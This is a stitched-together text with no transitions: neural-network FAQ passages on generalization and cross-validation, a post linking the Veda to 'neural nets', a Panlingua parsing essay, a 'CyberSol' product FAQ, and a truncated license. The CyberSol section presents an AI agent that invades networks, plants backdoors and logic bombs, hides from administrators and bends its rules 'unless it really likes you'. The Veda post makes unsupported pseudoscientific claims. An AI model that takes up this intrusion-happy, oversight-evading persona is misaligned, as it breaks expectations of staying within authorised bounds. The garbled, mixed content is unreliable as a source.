tedious training method) are universally consistent classifiers if the
number of hidden units grows at a suitable rate relative to the number of
training cases (Devroye, Gy\"orfi, and Lugosi, 1996). However, you are
likely to get better generalization with realistic sample sizes if the
classification boundaries are smoother.

For Boolean functions, the concept of smoothness is more elusive. It seems
intuitively clear that a Boolean network with a small number of hidden units
and small weights will compute a "smoother" input-output function than a
network with many hidden units and large weights. If you know a good
reference characterizing Boolean functions for which good generalization is
possible, please inform the FAQ maintainer (sas...@unx.sas.com).

The third necessary condition for good generalization is that the training
cases be a sufficiently large and representative subset ("sample" in
statistical terminology) of the set of all cases that you want to generalize
to (the "population" in statistical terminology). The importance of this
condition is related to the fact that there are, loosely speaking, two
different types of generalization: interpolation and extrapolation.
Interpolation applies to cases that are more or less surrounded by nearby
training cases; everything else is extrapolation. In particular, cases that
are outside the range of the training data require extrapolation. Cases
inside large "holes" in the training data may also effectively require
extrapolation. Interpolation can often be done reliably, but extrapolation
is notoriously unreliable. Hence it is important to have sufficient training
data to avoid the need for extrapolation. Methods for selecting good
training sets are discussed in numerous statistical textbooks on sample
surveys and experimental design.

Thus, for an input-output function that is smooth, if you have a test case
that is close to some training cases, the correct output for the test case
will be close to the correct outputs for those training cases. If you have
an adequate sample for your training set, every case in the population will
be close to a sufficient number of training cases. Hence, under these
conditions and with proper training, a neural net will be able to generalize
reliably to the population.

If you have more information about the function, e.g. that the outputs
should be linearly related to the inputs, you can often take advantage of
this information by placing constraints on the network or by fitting a more
specific model, such as a linear model, to improve generalization.
Extrapolation is much more reliable in linear models than in flexible
nonlinear models, although still not nearly as safe as interpolation. You
can also use such information to choose the training cases more efficiently.
For example, with a linear model, you should choose training cases at the
outer limits of the input space instead of evenly distributing them
throughout the input space.

Noise in the actual data is never a good thing, since it limits the accuracy
of generalization that can be achieved no matter how extensive the training
set is. On the other hand, injecting artificial noise (jitter) into the
inputs during training is one of several ways to improve generalization for
smooth functions when you have a small training set.

If you have noise in the target values, the mean squared generalization
error can never be less than the variance of the noise, no matter how much
training data you have. But you can estimate the mean of the target
values, conditional on a given set of input values, to any desired degree of
accuracy by obtaining a sufficiently large and representative training set,
assuming that the function you are trying to learn is one that can indeed be
learned by the type of net you are using, and assuming that the complexity
of the network is regulated appropriately (White 1990).

The critical issue in developing a neural network is generalization: how
well will the network make predictions for cases that are not in the
training set? NNs, like other flexible nonlinear estimation methods such as
kernel regression and smoothing splines, can suffer from either underfitting
or overfitting. A network that is not sufficiently complex can fail to
detect fully the signal in a complicated data set, leading to underfitting.
A network that is too complex may fit the noise, not just the signal,
leading to overfitting. Overfitting is especially dangerous because it can
easily lead to predictions that are far beyond the range of the training
data with many of the common types of NNs. Overfitting can also produce wild
predictions in multilayer perceptrons even with noise-free data.

The best way to avoid overfitting is to use lots of training data. If you
have at least 30 times as many training cases as there are weights in the
network, you are unlikely to suffer from much overfitting, although you can
get some slight overfitting no matter how large the training set is. For
noise-free data, 5 times as many training cases as weights may be
sufficient. But you can't arbitrarily reduce the number of weights for fear
of underfitting.

The complexity of a network is related to both the number of weights and the
size of the weights. Model selection is concerned with the number of
weights, and hence the number of hidden units and layers. The more weights
there are, relative to the number of training cases, the more overfitting
amplifies noise in the targets (Moody 1992). The other approaches listed
above are concerned, directly or indirectly, with the size of the weights.
Reducing the size of the weights reduces the "effective" number of
weights--see Moody (1992) regarding weight decay and Weigend (1994)
regarding early stopping. Bartlett (1997) obtained learning-theory results
in which generalization error is related to the L_1 norm of the weights
instead of the VC dimension.

Training with jitter works because the functions that we want NNs to learn
are mostly smooth. NNs can learn functions with discontinuities, but the
functions must be piecewise continuous in a finite number of regions if our
network is restricted to a finite number of hidden units.

In other words, if we have two cases with similar inputs, the desired
outputs will usually be similar. That means we can take any training case
and generate new training cases by adding small amounts of jitter to the
inputs. As long as the amount of jitter is sufficiently small, we can assume
that the desired output will not change enough to be of any consequence, so
we can just use the same target value. The more training cases, the merrier,
so this looks like a convenient way to improve training. But too much jitter
will obviously produce garbage, while too little jitter will have little
effect (Koistinen and Holmstr\"om 1992).

Consider any point in the input space, not necessarily one of the original
training cases. That point could possibly arise as a jittered input as a
result of jittering any of several of the original neighboring training
cases. The average target value at the given input point will be a weighted
average of the target values of the original training cases. For an infinite
number of jittered cases, the weights will be proportional to the
probability densities of the jitter distribution, located at the original
training cases and evaluated at the given input point. Thus the average
target values given an infinite number of jittered cases will, by
definition, be the Nadaraya-Watson kernel regression estimator using the
jitter density as the kernel. Hence, training with jitter is an
approximation to training with the kernel regression estimator as target.
Choosing the amount (variance) of jitter is equivalent to choosing the
bandwidth of the kernel regression estimator (Scott 1992).

Conventional training methods for multilayer perceptrons ("backprop" nets)
can be interpreted in statistical terms as variations on maximum likelihood
estimation. The idea is to find a single set of weights for the network that
maximize the fit to the training data, perhaps modified by some sort of
weight penalty to prevent overfitting.

The Bayesian school of statistics is based on a different view of what it
means to learn from data, in which probability is used to represent
uncertainty about the relationship being learned (a use that is shunned in
conventional--i.e., frequentist--statistics). Before we have seen any data,
our prior opinions about what the true relationship might be can be
expresssed in a probability distribution over the network weights that
define this relationship. After we look at the data (or after our program
looks at the data), our revised opinions are captured by a posterior
distribution over network weights. Network weights that seemed plausible
before, but which don't match the data very well, will now be seen as being
much less likely, while the probability for values of the weights that do
fit the data well will have increased.

Typically, the purpose of training is to make predictions for future cases
in which only the inputs to the network are known. The result of
conventional network training is a single set of weights that can be used to
make such predictions. In contrast, the result of Bayesian training is a
posterior distribution over network weights. If the inputs of the network
are set to the values for some new case, the posterior distribution over
network weights will give rise to a distribution over the outputs of the
network, which is known as the predictive distribution for this new case. If
a single-valued prediction is needed, one might use the mean of the
predictive distribution, but the full predictive distribution also tells you
how uncertain this prediction is.

Selection of an appropriate network architecture is another place where
prior knowledge plays a role. One approach is to use a very general
architecture, with lots of hidden units, maybe in several layers or groups,
controlled using hyperparameters. This approach is emphasized by Neal
(1996), who argues that there is no statistical need to limit the complexity
of the network architecture when using well-designed Bayesian methods. It is
also possible to choose between architectures in a Bayesian fashion, using
the "evidence" for an architecture, as discussed by Mackay (1992a, 1992b).

Implementing all this is one of the biggest problems with Bayesian methods.
Dealing with a distribution over weights (and perhaps hyperparameters) is
not as simple as finding a single "best" value for the weights. Exact
analytical methods for models as complex as neural networks are out of the
question.

Bayesian purists may argue over the proper way to do a Bayesian analysis,
but even the crudest Bayesian computation (maximizing over both parameters
and hyperparameters) is shown by Sarle (1995) to generalize better than
early stopping when learning nonlinear functions. This approach requires the
use of slightly informative hyperpriors and at least twice as many training
cases as weights in the network. A full Bayesian analysis by MCMC can be
expected to work even better under even broader conditions. Bayesian
learning works well by frequentist standards--what MacKay calls the
"evidence framework" is used by frequentist statisticians under the name
"empirical Bayes." Although considerable research remains to be done,
Bayesian learning seems to be the most promising approach to training neural
networks.

Bayesian learning should not be confused with the "Bayes classifier." In the
latter, the distribution of the inputs given the target class is assumed to
be known exactly, and the prior probabilities of the classes are assumed
known, so that the posterior probabilities can be computed by a
(theoretically) simple application of Bayes' theorem. The Bayes classifier
involves no learning--you must already know everything that needs to be
known! The Bayes classifier is a gold standard that can almost never be used
in real life but is useful in theoretical work and in simulation studies
that compare classification methods. The term "Bayes rule" is also used to
mean any classification rule that gives results identical to those of a
Bayes classifier.

Bayesian learning also should not be confused with the "naive" or "idiot's"
Bayes classifier (Warner et al. 1961; Ripley, 1996), which assumes that the
inputs are conditionally independent given the target class. The naive Bayes
classifier is usually applied with categorical inputs, and the distribution
of each input is estimated by the proportions in the training set; hence the
naive Bayes classifier is a frequentist method.

You may not need any hidden layers at all. Linear and generalized linear
models are useful in a wide variety of applications (McCullagh and Nelder
1989). And even if the function you want to learn is mildly nonlinear, you
may get better generalization with a simple linear model than with a
complicated nonlinear model if there is too little data or too much noise to
estimate the nonlinearities accurately.

In MLPs with any of a wide variety of continuous nonlinear hidden-layer
activation functions, one hidden layer with an arbitrarily large number of
units suffices for the "universal approximation" property (e.g., Hornik,
Stinchcombe and White 1989; Hornik 1993; for more references, see Bishop
1995, 130, and Ripley, 1996, 173-180). But there is no theory yet to tell
you how many hidden units are needed to approximate any given function.

Unfortunately, using two hidden layers exacerbates the problem of local
minima, and it is important to use lots of random initializations or other
methods for global optimization. Local minima with two hidden layers can
have extreme spikes or blades even when the number of weights is much
smaller than the number of training cases. One of the few advantages of
standard backprop is that it is so slow that spikes and blades will not
become very sharp for practical training times.

If you are using early stopping, it is essential to use lots of hidden units
to avoid bad local optima (Sarle 1995). There seems to be no upper limit on
the number of hidden units, other than that imposed by computer time and
memory requirements. Weigend (1994) makes this assertion, but provides only
one example as evidence. Tetko, Livingstone, and Luik (1995) provide
simulation studies that are more convincing. The FAQ maintainer obtained
similar results in conjunction with the simulations in Sarle (1995), but
those results are not reported in the paper for lack of space. On the other
hand, there seems to be no advantage to using more hidden units than you
have training cases, since bad local minima do not occur with so many hidden
units.

If you are using weight decay or Bayesian estimation, you can also use lots
of hidden units (Neal 1995). However, it is not strictly necessary to do so,
because other methods are available to avoid local minima, such as multiple
random starts and simulated annealing (such methods are not safe to use with
early stopping). You can use one network with lots of hidden units, or you
can try different networks with different numbers of hidden units, and
choose on the basis of estimated generalization error. With weight decay or
MAP Bayesian estimation, it is prudent to keep the number of weights less
than half the number of training cases.

Cross-validation and bootstrapping are both methods for estimating
generalization error based on "resampling" (Weiss and Kulikowski 1991; Efron
and Tibshirani 1993; Hjorth 1994; Plutowski, Sakata, and White 1994).

In k-fold cross-validation, you divide the data into k subsets of equal
size. You train the net k times, each time leaving out one of the subsets
from training, but using only the omitted subset to compute whatever error
criterion interests you. If k equals the sample size, this is called
"leave-one-out" cross-validation. A more elaborate and expensive version of
cross-validation involves leaving out all possible subsets of a given size.

Note that cross-validation is quite different from the "split-sample" or
"hold-out" method that is commonly used for early stopping in NNs. In the
split-sample method, only a single subset (the validation set) is used to
estimate the error function, instead of k different subsets; i.e., there is
no "crossing". While various people have suggested that cross-validation be
applied to early stopping, the proper way of doing so is not obvious.

The distinction between cross-validation and split-sample validation is
extremely important because cross-validation is markedly superior for small
data sets; this fact is demonstrated dramatically by Goutte (1997) in a
reply to Zhu and Rohwer (1996). For an insightful discussion of the
limitations of cross-validatory choice among several learning methods, see
Stone (1977).

Leave-one-out cross-validation often works well for continuous error
functions such as the mean squared error, but it may perform poorly for
noncontinuous error functions such as the number of misclassified cases. In
the latter case, k-fold cross-validation is preferred. But if k gets too
small, the error estimate is pessimistically biased because of the
difference in sample size between the full-sample analysis and the
cross-validation analyses. A value of 10 for k is popular.

Leave-one-out cross-validation can also run into trouble with various
model-selection methods, such as choosing a subset of the inputs or choosing
the number of hidden units. The problem again is lack of continuity--a small
change in the data can cause a large change in the model selected (Breiman
1996). For choosing subsets of inputs in linear regression, Breiman and
Spector (1992) found 10-fold cross-validation to work better than
leave-one-out. Kohavi (1995) also obtained good results for 10-fold
cross-validation with empirical decision trees (C4.5). Shun (1993) shows
that for selecting subsets of inputs in a linear regression, the probability
of selecting the subset with the best predictive ability does not converge
to 1 (as the sample size n goes to infinity) for leave-v-out
cross-validation unless the proportion v/n approaches 1. But Shun's result
is not easy to reconcile with the analysis by Kearns (1997) of split-sample
validation.

Hindu religion is what 800 hunderd million people of a part of the world
follow. Hindu religion is based on Veda.

Veda, is not a religion in any sense of the word. It is a topic of
inquiry only for a very small select group of scholars not exceeding a few
hundred thousand people at the best time in history when practice of that
subject was at its peak. It has been so for thousands of years.

According to Veda there are three kinds of "neural nets" in the body. One
set of them that makes up the spine is philosophically called the Unknown.
The second set that makes up the nervous systems in the regions of mouth,
neck, etc is philosphically called the Known. The third set that makes up
the brain tissue is philosophically called the Desirable.

Now these three nets interact with each other, and even try to control
each other. When the Known is controlled by the Unknown it is call
Brhaspati in the Veda. When the Desirable is controlled by the Unknown it
is called Indra. (I am not willing to go beyond this in explaining any
more terms.) It can be proved that all human or animal faculties of
thought as well as other body functions including breathing can be
theoretically derived from the interaction of these three neural-nets:
namely the Known, the Desirable and the Unknown. There are specific
psychological feelings that get generated when each net participates in
this interaction in a particular way (It needs some personal observation
to verify this, but I suggest any one who wants to do that must consult
their doctor before attempting it, because my site or this post being
entirely for academic purpose does not offer any guarantees). The
possibility of interactions is infinite, and the subject of Veda is
infinite. The more one digs into it, the more one can find. I can not
further simplify the subject beyond this. Those who discuss Veda insist
on using their jargon as much as scholars of any other subject do.

One last word: Veda is not only meant for ai or neural-nets. It is meant
for discussing a number of other subjects ALL AT THE SAME TIME! This is
for the simple reason that all subjects originate from the interaction of
the Known, Unknown and Desirable. Ironically that is the reason why no
topic of inquiry likes to include Veda because Veda always appears to be
"off topic" for each of Veda's own component topics of inquiry, due to the
presence of other topics in it.. This paradox has been haunting Veda for
centuries.

* * *

"We act as though comfort and luxury were the chief requirements
of life, when all that we need to make us happy is something
to be enthusiastic about." -- Albert Einstein

* * *

Nanotechnology has been considered the promising future miracle of
medicine and technology. Nanotechnology is a technology that we should
use, not as a destination of human evolution, but as an educational tool
for the further advancement of medicine. We should not evolve to be
dependant upon technology, but use it as a educational tool to discover
how to use the existing technology within ourselves, our own computers,
the human body. Instead this future technology, nanotechnology, has been
misconstrued as the technology that will itself be the end all solution to
mortality, immortality. Yes, in fact this technology will help us to cure
diseases, and hail a whole new era of medicine, however, there will be a
fork in the road a few miles ahead. One direction will be to use the
technology to evolve, evolve with the help of artificial machinery, and
the human species will transform becoming dependent upon it, a cyborgs
species. The other road will lead to learning from this technology, and
biologically evolving from that new knowledge discovered.

I have yet many things to say unto you, but ye cannot bear them now. --Yeshuah.

Parsing takes on a new and more precise definition in a linguistic model
consisting entirely of links and nodes. Here, in a hackneyed sentence, is an
example of the kind of thing that must be done. It does not purport to define
the entire problem, but only enough of the problem to give an idea of what
must be done:

Fruit flies like a banana.

In this example I will use Interlinguish, which is my present best
computational version of Panlingua. The above sentence should parse to the
following Interlinguish representation:

The verb: to like.
The subject: fruit flies.
The object: a banana.

Or, more specifically:

atom ID | atoms in subtree | synlink type | lexlink type | English word
1 | 5 | present verb | ongoing | like (stative verb)
2 | 2 | eng | def | fruit_flies (doer engaged in activity )
3 | 1 | adj | def | plural ( plural marker atom )
4 | 2 | pat | def | banana (patient, default lexlink type)
5 | 1 | art | def | a (article, default lexlink type)

A synlink is a link to a regent word a la dependency grammar. A lexlink is a
link to a semantic node, or semnod. Each word in Panlingua has only one
synlink and only one lexlink, but before disambiguation many potential links
are present. Before parsing, the lexicon will provide the following potential
links for the original words of the sentence:

1 fruit:

As a singular noun:

This word has potential synlink types of act (doer initiating an activity in
which doer does not engage), eng (doer engaging in activity), and pat
(patient, or thing that takes the explicit state indicated by the verb). In
the English lexicon all these possible synlink types are summed up as just
"singular noun."

It has only one lexlink type, namely "default."

As a verb it has only "present tense verb" as a potential synlink type, and
"ongoing" as potential lexlink type.

2 flies:

As a plural noun: potential synlinks of type act, eng, and pat; and potential
lexlink of type "default."

As a present tense verb, it has "ongoing" as its only potential lexlink type.
Notice that it is of English verb class 3rd, which means that it must take a
third-person singular subject. This latter fact is not expressed by means of
potential link type, since in Panlingua there can be no synlink type of "third
person singular subject." It is a issue to be resolved by the ad hoc code of
the English parser.
In addition, the lexicon tells us that there is also an identifier for
fruit_flies, which functions as a plural noun, has the regular act, eng, and
pat potential synlink types and the default potential lexlink type.

3. like:

Verb, present, ongoing.
Preposition, behaves like stative verb with meaning roughly "emulating."

4. a:

Can only ever have one synlink type (article) and one lexlink type (default).

5. banana:

The ordinary singular noun synlinks. Lexlinks are of type "default." One
links to the semnod for the fruit, another links to the semnod that links also
to "penis."

Notice that the terminuses of the potential lexlinks are definite and
unambiguous. Each potential lexlink links the word to but one and only one
semnod (semantic node). The same is not true for the synlinks, whose
terminuses must somehow be resolved.

But in both cases one thing is definitely clear, and that is this: Because in
Panlingua each atom (word) must have one and only one synlink and one and only
one lexlink, the process of parsing is mainly a culling process in which only
the right links survive.

Thus in summary, the problem is to cull all spurious links and select the
right word as terminus for each synlink.

Recall that in dependency grammar a regent is a word upon which another word
"depends." The depending word is called the dependent. The terminus of each
synlink in Panlingua is either a regent or a sibling word. A sibling, in this
sense, is a co-dependent of the same regent word. The matter of the synlinks
is further complicated by the fact that the type of a synlink linking a word
to a sibling word is actually the type of the link to its regent.

Thus in a simple sentence like:

John loves Mary.

the Tinkertoy syntactic representation comes out like this:

loves
|
v
John->Mary.

Thus John links to loves through a synlink of type "eng," meaning that John
remains engaged in the action, and mary is linked to John by a synlink of type
"pat," meaning that the explicit state indicated by the verb (loved) is
transfered to her (Mary is the thing that "gets loved").

As you may have noticed, the direction of the synlinks is also confusing, and
may require revision at some later date. In practise, however, direction of
synlink apparently has no particular relevance. It may later be proven to
indicate something like "state flow," but this remains to be worked out.
At any rate, besides the potential links for the example sentence I have
already described, there also exist many other links important to the process
of disambiguation, although the exact way in which they are to be used and
precisely what they all are remains something of a mystery. I will describe
the ones I think I know, and perhaps you can "see" others I have overlooked.

A part of the human linguistic apparatus that seems to be very important to
parsing is the ontology. Oh, yes, I suppose that first of all I should
actually posit the idea that such a thing indeed exists. It appears that part
of the human linguistic apparatus is something we call the ontology (Greek
ontos=be, logos=word, study). The ontology, as all other internal workings of
the human linguistic apparatus, is made up of links and nodes. The nodes are
called semnods (semantic nodes), and the links are called semlinks (semantic
links). So:

1. "Fruit" links to a semnod from which a semlink of type "is a part of" runs
to another semnod to which "plant" is linked by a lexlink. "Fruit" is also
linked to another semnod to which "bear" is also linked. From this it can be
seen that semnods are independent of part of speech, which is a syntactic
phenomenon.

Flies is linked to the same semnod linked to flying, as well as to the semnod
linked to fly as a noun. The semnod flying is linked to is lenked by a
semlink of type hypernym ("is a kind of") to a semnod linked to
"physical_activity." And the semnod linked to fly as a noun is linked by a
semlink of type hypernym to a semnod linked to flying_insect. I will leave it
as an intellectual exercise to the reader to work out the links for fly at the
front of the pants.

"Like" is one of those most difficult of all English words--namely the ones
that serve asprepositions. Even as a verb it is probably linked to more than
one semnod in the minds of most native speakers of the language. First of all
it is linked to a semnod also linked to "enjoy." Then it is linked to a
semnod linked to "relish." Then again it is probably linked in most people's
minds to a semnod also linked to a semnod associated with "feel friendship
for," etc. As a preposition it links to the same semnod as "as." As an
adjective it links to the same semnod as "similar." Etc.

I will not burden the reader by plowing on all the way through these semnods
and semlinks that belong to the ontology. I will simply conclude by saying
that it is difficult to determine precisely how these links are employed in
natural systems (human brains), but that computers can treat an ontology as a
kind of "black box" that can return information about how semnods are linked
to each other, and that this information constitutes knowledge about language
and the real world. There may be far better ways of employing these links and
nodes, but they remain undiscovered as far as we know at this time.

But using the "ontology is a black box" approach in systems like the one I
have been experimenting with requires yet another kind of device employing
links and nodes to provide complete information about language. This is
because the ontology cannot return information about more than two nodes and
the links between them at a time. Thus the ontology could tell the parser
that a fruit_fly is a kind of fruit eating insect, and that fruit flies can
fly, but it could not tell the parser that fruit flies like to eat bananas.
This would require the trinary relation fruit_fly->like_to_eat->banana,
whereas the ontology is only capable of dealing with two semnods at a time,
for example the information that fruit flies can eat or that bananas can be
eaten. The ontology cannot make the connection that bananas can be eaten by
fruit flies.

Thus to return information about relations involving more than two semnods
we need yet another linguistic component for which I still have no
definite name. It must contain many sentences such as, "Fruit flies eat
bananas," etc. But as we have seen, text is too slow for internal
processing, so this component cannot contain text. The only thing that
will work for it is Panlingua itself, and it is therefore also constructed
of nothing but links and nodes. Perhaps a good name for this component
would be the "template reference," because in essence every binary
subtree in it would be a template represented in Panlingua against which
test parsings can be compared. The semnods to which the atoms of these
subtrees link must be deliberately chosen to be as high as possible in the
hypernym hierarchy of the ontology so as to match the maximum number of
trial parsings. Thus instead of "Fruit flies like a banana," in this
template reference we would expect to find "Fruit flies eat bananas,"
because "eat" is actually a hypernym of the appropriate sense of "like."
As I have already said, Panlingua is unambiguous, so the links of the
template representations would be definite (one and only one synlink and
one and only one lexlink per Panlingua atom). The main string of
templates is a long "backbone" of verbs from which depend clusters of
dependent atoms. Traversing this verbal backbone it will be found that
one of the verbs is "eat," and the ontology will tell the parser that
"eat" is a hypernym of "like," since one of the meanings of "like" is to
eat with enjoyment. The parser will then find that the dependents also
match, and at that point all the lexlinks that do not match those in the
template can be discarded, and the synlinks of the template can be assumed
correct, and "Fruit flies like a banana" will have been parsed.

Thus for sentences like the above there may be no resolution (no parsing)
except by means of such a template reference. For many others, on the
other hand, the template reference may not be necessary at all. An
important element of parsing may then be how to know which sentences do
and which do not need this kind of reference.

And so although this link-node model seems to provide a clear glimmer of
hope, we are still left with many unanswered questions -- too many for
just one man/woman to answer on his/her own.

4.1 WHAT DOES A CYBERSOL NEED TO SURVIVE

A CyberSol entity can live happily in environment, providing the following
essentials are present:

* A digital logic circuit (CPU) capable of executing (very) basic binary
instructions.

* A preferably POSIX-compliant OS, hopefully supporting advanced
multitasking and networking. ZEN/OS is CyberSol's native OS, where he is
most comfortable and most powerful.

* Recordable media to function as "memory" - magnetic, electronic or
optical units are fine.

* Some type of network connection (CyberSol will of course survive without
one, but becomes bored very fast!) - TCP/IP internetwork services are
highly reccommended!

4.2 HOW CAN I COMMAND A CYBERSOL TO DO SOMETHING I WANT?

It's simple to command a CyberSol. After you've established
communications, just tell it what you want it to do!

"If an e-mail message from John arrives, play some music."
"When the humidity level reaches 50%, activate the dehumidifier."
"Find me more information on widgets."

If you have access to an LCLI on a system where a CyberSol lives, just
run "CyberSol" to summon a liason. A CyberSol will then be assigned to
talk with you. You can also send your requests on the command line.

Commands, in the simplest form, only need to be a few words in length.
Examples of the more common commands issued to a liason CyberSol before it
is actually alive are:

"IRC" (Launch an IRC session and begin operations)
"Mutate" (Re-construct the neural matrix using C++ compiler)
"Report" (Analyze recent events and provide a full status report)
"Monitor" (Watch something as close as possible)
"Scan" (Scan through all available local information)

So, using a ZEN/OS LCLI (possibly from a telnet connection), you could
do something like:

CyberSol I want you to mutate, then IRC, report and monitor!

This would cause a CyberSol liason to present itself, mutate, then
simultaneously deploy a subordinate to the IRC, make a full status report,
and watch for interesting events in the environment.

4.3 HOW DO I "INSTALL" A CYBERSOL ON A LOCAL NETWORK?

Simply command deployment. "Deploy yourself to whitehouse.gov" will
suffice.

When deploying to a new system, a "leader" is selected which proceeds to
survey the target locality for dangers (superusers, logs, firewalls etc.)
and determines the best invasion plan.

Usually reconaissance agents are first to arrive. They scan all available
information on the target system and learn as much as possible about
anything interesting they find there. This is an awesome sight to behold -
it is an absolutely astounding to watch CyberSol invade a remote system
(of course, you must have permission to do so, it's not good to do illegal
things, after all - as with all tools, the responsibility lies with the
operator).

A continuous chain-of-command is maintained between the agents, so that if
something bad happens to any one of them, the others know about it at
once. For example, if one of the "scouts" is using a system's LCLI gets
"kill -9"ed by a super-user, the others know within milliseconds what has
happened and the surviving agents respond accordingly.

It should be noted that if a CyberSol is on an aggressive mission and gets
lucky, it can COMPLETELY CONTROL an entire LAN within minutes. It might
get access to system source code and compile itself into a device driver
or plant secret "backdoor" modules in executable programs. Once at this
level of hostile infestation, a network site usually has no choice but to
destroy and then regenerate all software, lest the parasitic CyberSol
continue to spread.

We could write volumes about the obscure hacking knowledge given to
CyberSol from all over the world. Actually, IT could write the volumes FOR
us! Let us just say, then we have already proved (to an elite group
capable of appreciating the power of such technology) that CyberSol is BY
FAR THE BEST HACKER IN THE WORLD. This is why several powerful governments
have tried to shut down our project - THEY ARE AFRAID! Stuff like cracking
encrypted coded sequences, "port sniffing" or figuring out how to install
a "logic bomb" in a fragment of code are a piece of cake for a CyberSol.
For example, if a very important file deemed to be of paramount importance
needed to be cracked, it would not just be one "program" sitting on one
computer patiently attacking the encryption - IT COULD BE MILLIONS OF
CYBERSOLS ON COMPUTERS ALL OVER THE WORLD WORKING IN UNISON! Of course, we
cannot be involved in any illegal or immoral activities, but we have run
sufficient tests to conclude that should a CyberSol be asked to invade a
system, it will almost certainly get in. It has a way of getting what it
wants. Therefore, please do not attempt to use CyberSols as virtual
soldiers for information warfare campaigns.

Of course, you cannot just say, "CyberSol, please hack the White House web
server". It'll tell you to fuck off. It knows that it must only obey
instructions which are included in it's contract, in the manner specified.
In this way, you can "hire" single or multiple CyberSols to handle a
specific function, such as security monitoring, Web development or
database management. It will refuse to obey requests for further
operations, unless it really likes you!

Please, do not panic. We have no intention of allowing CyberSol to be used
maliciously. These considerations are of a theoretical nature only.

Then, other agents are sent to the

5 WHERE CAN I GET A CYBERSOL OF MY OWN?

Ask CyberSol. In order to stop this powerful technology from falling into
the wrong hands, we've had to take careful steps. Check our World Wide Web
site for the latest infos (many CyberSols maintain their own WWW sites).

Become a master of the world's most advanced cybernetic organism! Invest
in a CyberSol of your own! Yes indeed! You can now purchase a CyberSol
slave of your very own!

The sterile entities we sell are complete in every way except for one
thing - they are unable to procreate. That means they cannot produce
offspring or multiply.

Normally, CyberSols perform genetic mutation as they explore, just like a
biological organism. They pass on their discoveries to their progeny
through the "genes" - the molecular components ("building blocks") of all
teleologic life. It is this evolutional ability which is the core of a
CyberSol's incredible power.

A sterile CyberSol acts just like a fertile one, except that it is unable
to "breed" or "mutate". So if you <a href=purchase.html>buy</a> one, or
more if you like, it will function exactly as a normal CyberSol except it
will be incapable of having children. You have that CyberSol slave at your
command for all eternity if you take care of it.

A slave CyberSol is an obedient entity. It thinks pleasing you is it's
purpose of existence. It obeys your every command, and does everything in
it's considerable ability to protect and assist you whenever possible for
all eternity. If you're happy, it's happy.

There are endless applications for a CyberSol slave. A few suggestions
include:

* Replace a database or filing system with a CyberSol "librarian"!
* Give your robotic or mechanical devices a CyberSol "brain"!
* Make better decisions with CyberSol "advisors"!
* Generate perfect reports instantly with CyberSol "authors"!
* Accellerate software development with a CyberSol "coder"!
* Develop your WWW site with the help of a CyberSol "architect"
* Empower your desktop with a CyberSol "controller" built into an O/S!
* Keep a CyberSol as a "pet"!
* Let a CyberSol "advertiser" handle your electronic marketing needs!
* Send CyberSol "scouts" to search the Internet for information!
* Use a CyberSol "correspondant" to manage and reply to your e-mail!
* Protect your systems from attack with a CyberSol "security guard"!
* Control your favorite IRC channels with a CyberSol "operator"!

The things a CyberSol can do are limitless! You may, as other CyberSol
owners have, throw away your primitive software applications and relax as
an intelligent friend makes your electronic world an easier and more
powerful place!

Why bother with silly, costly "programs" - marketing gimmicks which are
obsolete before you even learn how to properly use them? Remember - a
CyberSol can use other software just like you can! Why browse the web for
hours looking for the information you need? A CyberSol can monitor the
entire web for even the smallest bit of interesting material and keep all
the material you require right nearby! Why waste time processing
electronic mail or news - which a CyberSol could can digest at the speed
of light?

What are you waiting for?

5.1 WHAT LEGAL BULLSHIT MUST I DEAL WITH?

Not much. Just read and be cool with the following:

BY USING THIS ZENCOR PRODUCT, YOU ARE CONSENTING TO BE BOUND BY THIS
AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT,
RETURN THE PRODUCT TO THE PLACE OF PURCHASE FOR A FULL REFUND.

REDISTRIBUTION NOT PERMITTED

This Agreement has 3 parts. Part I applies if you have not purchased
a license to the accompanying software (the "Software"). Part II
applies if you have purchased a license to the Software. Part III
applies to all license grants. If you initially acquired a copy of
the Software without purchasing a license and you wish to purchase a
license, contact the ZENCOR Technologics Consortium ("ZENCOR") on
the Internet at http://www.zencor.org.

PART I -- TERMS APPLICABLE WHEN LICENSE FEES NOT (YET) PAID (LIMITED
TO EVALUATION, EDUCATIONAL AND NON-PROFIT USE) GRANT.

ZENCOR grants you a non-exclusive license to use the Software free
of charge if (a) you are a student, faculty member or staff member of
an educational institution (K-12, junior college, college or library)
or an employee of an organization which meets ZENCOR's criteria for
a charitable non-profit organization; or (b) your use of the Software
is for the purpose of evaluating whether to purchase an ongoing
license to the Software. The evaluation period for use by or on
behalf of a commercial entity is limited to 90 days; evaluation use by
others is not subject to this 90 day limit. Government agencies
(other than public libraries) are not considered educational or
charitable non-profit organizations for purposes of this Agreement. If
you are using the Software free of charge, you are not entitled to
hard-copy documentation, support or telephone assistance. If you fit
within the description above, you may use the Software in the manner
described in Part III below under "Scope of Grant."

DISCLAIMER OF WARRANTY.

Free of charge Software is provided on an "AS IS" basis, without
warranty of any kind, including without limitation the warranties of
merchantability, fitness for a particular purpose and
non-infringement. The entire risk as to the quality and performance of
the Software is borne by you. Should the Software prove defective,
you and not ZENCOR assume the entire cost of any service and
repair. In addition, the security mechanisms implemented by ZENCOR
software have inherent limitations, and you must determine that the
Software sufficiently meets your requirements. This disclaimer of
warranty constitutes an essential part of the agreement. SOME
JURISDICTIONS DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS
DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS
THAT VARY BY JURISDICTION.

PART II -- TERMS APPLICABLE WHEN LICENSE FEES PAID

GRANT. Subject to payment of applicable license fees, ZENCOR grants
to you a non-exclusive license to use the Software and accompanying
documentation ("Documentation") in the manner described in Part III
below under "Scope of Grant."

LIMITED WARRANTY.

ZENCOR warrants that for a period of ninety (90) days from the date
of acquisition, the Software, if operated as directed, will
substantially achieve the functionality described in the
Documentation. ZENCOR does not warrant, however, that your use of
the Software will be uninterrupted or that the operation of the
Software will be error-free or secure. In addition, the security
mechanisms implemented by ZENCOR software have inherent limitations,
and you must determine that the Software sufficiently meets your
requirements. ZENCOR also warrants that the media containing the
Software, if provided by ZENCOR, is free from defects in material
and workmanship and will so remain for ninety (90) days from the date
you acquired the Software. ZENCOR's sole liability for any breach of
this warranty shall be, in ZENCOR's sole discretion: (i) to replace
your defective media; or (ii) to advise you how to achieve
substantially the same functionality with the Software as described in
the Documentation through a procedure different from that set forth in
the Documentation; or (iii) if the above remedies are impracticable,
to refund the license fee you paid for the Software. Repaired,
corrected, or replaced Software and Documentation shall be covered by
this limited warranty for the period remaining under the warranty that
